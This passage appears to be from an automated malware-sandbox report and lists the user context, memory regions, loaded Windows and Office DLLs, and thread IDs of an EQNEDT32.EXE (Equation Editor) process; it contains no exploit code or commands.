"C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 836 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 837 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 838 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 839 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 840 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 841 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 842 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 843 start_va = 0x400000 end_va = 0x48dfff entry_point = 0x400000 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 844 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 845 start_va = 0x77270000 end_va = 0x773effff entry_point = 0x77270000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 846 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 847 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 848 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 849 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 850 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 851 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 852 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 857 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 858 start_va = 0x310000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 859 start_va = 0x490000 end_va = 0x490fff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 860 start_va = 0x74b00000 end_va = 0x74b07fff entry_point = 0x74b00000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 861 start_va = 0x74b10000 end_va = 0x74b6bfff entry_point = 0x74b10000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 862 start_va = 0x74b70000 end_va = 0x74baefff entry_point = 0x74b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 863 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 864 start_va = 0x1c0000 end_va = 0x226fff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 865 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 866 start_va = 0x75250000 end_va = 0x75295fff entry_point = 0x75250000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 867 start_va = 0x759f0000 end_va = 0x75afffff entry_point = 0x759f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 868 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x0 region_type = private name = "private_0x0000000076e70000" filename = "" Region: id = 869 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x0 region_type = private name = "private_0x0000000076f70000" filename = "" Region: id = 870 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 871 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 872 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 873 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 874 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 875 start_va = 0x741a0000 end_va = 0x74354fff entry_point = 0x741a0000 region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 876 start_va = 0x74870000 end_va = 0x7493afff entry_point = 0x74870000 region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 877 start_va = 0x74980000 end_va = 0x74a03fff entry_point = 0x74980000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 878 start_va = 0x74be0000 end_va = 0x74beafff entry_point = 0x74be0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 879 start_va = 0x74bf0000 end_va = 0x74c06fff entry_point = 0x74bf0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 880 start_va = 0x74c10000 end_va = 0x74c74fff entry_point = 0x74c10000 region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 881 start_va = 0x74dc0000 end_va = 0x74dcbfff entry_point = 0x74dc0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 882 start_va = 0x74dd0000 end_va = 0x74e2ffff entry_point = 0x74dd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 883 start_va = 0x74e90000 end_va = 0x74ea8fff entry_point = 0x74e90000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 884 start_va = 0x750d0000 end_va = 0x75126fff entry_point = 0x750d0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 885 start_va = 0x75130000 end_va = 0x751bffff entry_point = 0x75130000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 886 start_va = 0x752a0000 end_va = 0x7534bfff entry_point = 0x752a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 887 start_va = 0x75450000 end_va = 0x755abfff entry_point = 0x75450000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 888 start_va = 0x755b0000 end_va = 0x7564cfff entry_point = 0x755b0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 889 start_va = 0x756e0000 end_va = 0x7577ffff entry_point = 0x756e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 890 start_va = 0x75780000 end_va = 0x75789fff entry_point = 0x75780000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 891 start_va = 0x75790000 end_va = 0x7588ffff entry_point = 0x75790000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 892 start_va = 0x75c50000 end_va = 0x76899fff entry_point = 0x75c50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 893 start_va = 0x76d80000 end_va = 0x76e6ffff entry_point = 0x76d80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 894 start_va = 0x6f0000 end_va = 0x877fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 895 start_va = 0x74e30000 end_va = 0x74e8ffff entry_point = 0x74e30000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 896 start_va = 0x75b00000 end_va = 0x75bcbfff entry_point = 0x75b00000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 900 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 901 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 902 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 903 start_va = 0x260000 end_va = 0x266fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 904 start_va = 0x270000 end_va = 0x271fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 905 start_va = 0x880000 end_va = 0xa00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 906 start_va = 0xa10000 end_va = 0x1e0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 907 start_va = 0x1e10000 end_va = 0x20defff entry_point = 0x1e10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 908 start_va = 0x20e0000 end_va = 0x24d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020e0000" filename = "" Region: id = 909 start_va = 0x6fff0000 end_va = 0x6fffffff entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 910 start_va = 0x74970000 end_va = 0x74972fff entry_point = 0x74970000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 912 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 913 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 914 start_va = 0x24e0000 end_va = 0x28dffff entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 915 start_va = 0x73f60000 end_va = 0x7419ffff entry_point = 0x73f60000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 916 start_va = 0x76b60000 end_va = 0x76beefff entry_point = 0x76b60000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 917 start_va = 0x3de20000 end_va = 0x3de2dfff entry_point = 0x3de20000 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 918 start_va = 0x74a70000 end_va = 0x74aeffff entry_point = 0x74a70000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 919 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 920 start_va = 0x28e0000 end_va = 0x29befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028e0000" filename = "" Region: id = 921 start_va = 0x29f0000 end_va = 0x2a2ffff entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 922 start_va = 0x75650000 end_va = 0x756d2fff entry_point = 0x75650000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 924 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 925 start_va = 0x2d0000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 926 start_va = 0x2a30000 end_va = 0x2b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 927 start_va = 0x2b30000 end_va = 0x2c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 928 start_va = 0x74830000 end_va = 0x74845fff entry_point = 0x74830000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 929 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 930 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 931 start_va = 0x747f0000 end_va = 0x7482afff entry_point = 0x747f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 932 start_va = 0x747e0000 end_va = 0x747edfff entry_point = 0x747e0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 933 start_va = 0x390000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 934 start_va = 0x4a0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 935 start_va = 0x2c30000 end_va = 0x2d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c30000" filename = "" Region: id = 936 start_va = 0x2d30000 end_va = 0x2e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 937 start_va = 0x2e30000 end_va = 0x2eaffff entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 938 start_va = 0x2eb0000 end_va = 0x2f6ffff entry_point = 0x2eb0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 939 start_va = 0x2fe0000 end_va = 0x301ffff entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 940 start_va = 0x74a50000 end_va = 0x74a62fff entry_point = 0x74a50000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 941 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 942 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Thread: id = 43 os_tid = 0xb38 Thread: id = 45 os_tid = 0xb50 Thread: id = 46 os_tid = 0xb54 Thread: id = 47 os_tid = 0xb58 Thread: id = 48 os_tid = 0xb5c